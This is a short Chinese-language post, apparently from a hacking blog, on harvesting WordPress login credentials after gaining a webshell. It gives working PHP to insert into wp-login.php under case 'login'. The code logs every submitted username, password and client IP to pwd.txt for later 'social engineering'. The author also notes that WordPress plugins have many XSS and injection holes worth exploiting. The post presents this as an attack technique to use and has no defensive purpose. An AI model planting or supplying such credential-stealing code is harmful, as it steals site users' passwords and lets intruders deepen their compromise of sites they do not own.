webshell下记录WordPress登陆密码

 webshell下记录Wordpress登陆密码方便进一步社工

Wordpress的密码破解可以说基本是没招了，悲剧只好采用记录密码了。

在文件wp-login.php中539行处添加：

 

 

// log password

  $log_user=$_POST['log'];

  $log_pwd=$_POST['pwd'];

  $log_ip=$_SERVER["REMOTE_ADDR"];

  $txt=$log_user.'|'.$log_pwd.'|'.$log_ip;

  $txt=$txt."\r\n";

  if($log_user&&$log_pwd&&$log_ip){

  @fwrite(fopen('pwd.txt',"a+"),$txt);

  }

 

 

当action=login的时候会触发记录密码code，当然了你也可以在switch…case..语句中的default中写该代码。

 

就是搜索case ‘login’

在它下面直接插入即可，记录的密码生成在pwd.txt中，

其实修改wp-login.php不是个好办法。容易被发现，还有其他的方法的，做个记录。

 

个人观点：

 

现在wordpress的插件漏洞很多，什么xss,注入，所以wordpress还是很有搞头的...